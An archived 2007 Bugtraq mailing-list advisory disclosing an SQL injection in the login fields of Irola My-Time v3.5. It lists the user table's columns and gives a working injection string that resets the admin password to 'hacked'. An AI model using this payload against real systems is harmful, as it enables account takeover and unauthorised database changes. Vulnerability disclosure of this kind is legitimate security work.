lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20071123095335.8895.qmail@securityfocus.com> Date: 23 Nov 2007 09:53:35 -0000 From: no-reply@...a-Security.net To: bugtraq@...urityfocus.com Subject: Aria-Security.net: Irola My-Time v3.5 SQL Injection Aria-Security Team http://Aria-Security.Net ----------------------------- Original Advisory (and more details) @ http://aria-security.net/forum/showthread.php?p=1106 Irola My-Time v3.5 http://www.irola.com Username/Password Fields can run SQL Queries. Therefore: We get the Tables: UserInfo.UserID UserInfo.Login UserInfo.Password UserInfo.UserNumber UserInfo.FirstName UserInfo.LastName UserInfo.TeamID UserInfo.Address UserInfo.City UserInfo.ZipCode UserInfo.CountryID UserInfo.Phone Useful Injection: (changes admin's passwsord to hacked) -1' UPDATE UserInfo set Password= 'hacked' Where(UserID= '1');-- MORE HELP AT the Original Page. Greetz: AurA Credits goes to Aria-Security Team Regards, The-0utl4w